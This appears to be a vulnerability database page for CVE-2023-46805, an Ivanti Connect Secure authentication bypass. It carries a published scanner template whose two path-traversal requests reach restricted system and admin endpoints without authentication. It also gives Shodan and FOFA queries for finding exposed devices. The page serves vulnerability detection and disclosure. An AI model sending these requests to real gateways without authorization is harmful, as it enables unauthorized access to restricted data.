CVE-2023-46805: Ivanti ICS - Authentication Bypass

日期: 2025-08-01 | 影响软件: Ivanti ICS | POC: 已公开

漏洞描述

An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.

PoC代码[已公开]

id: CVE-2023-46805

info:
  name: Ivanti ICS - Authentication Bypass
  author: DhiyaneshDK,daffainfo,geeknik
  severity: high
  description: An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
  reference:
    - https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
    - https://nvd.nist.gov/vuln/detail/CVE-2023-46805
    - http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html
    - https://github.com/H4lo/awesome-IoT-security-article
    - https://github.com/inguardians/ivanti-VPN-issues-2024-research
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2023-46805
    cwe-id: CWE-287
    epss-score: 0.94377
    epss-percentile: 0.99963
    cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: ivanti
    product: connect_secure
    shodan-query: "html:\"welcome.cgi?p=logo\""
    fofa-query: body="welcome.cgi?p=logo"
    google-query: intitle:"ivanti connect secure"
  tags: packetstorm,cve,cve2023,kev,auth-bypass,ivanti,vkev

http:
  - raw:
      - |
        GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /api/v1/cav/client/status/../../admin/options HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'contains_all(body_1, "build", "system-information", "software-inventory")'
          - 'contains(header_1, "application/json")'
        condition: and

      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains_all(body_2, "poll_interval\": 300", "block_message\": \"")'
          - 'contains(header_2, "application/json")'
        condition: and
# digest: 490a0046304402207e9c93c3e81065c9869e7c2a6000c4fb64b92e81dbebefdf8159bd680a74a040022008c4093a4ae970ebb5efb6053d43a37871fa74a85d8b859182079ccae8480908:922c64590222798bb761d5b6d8e72950

相关漏洞推荐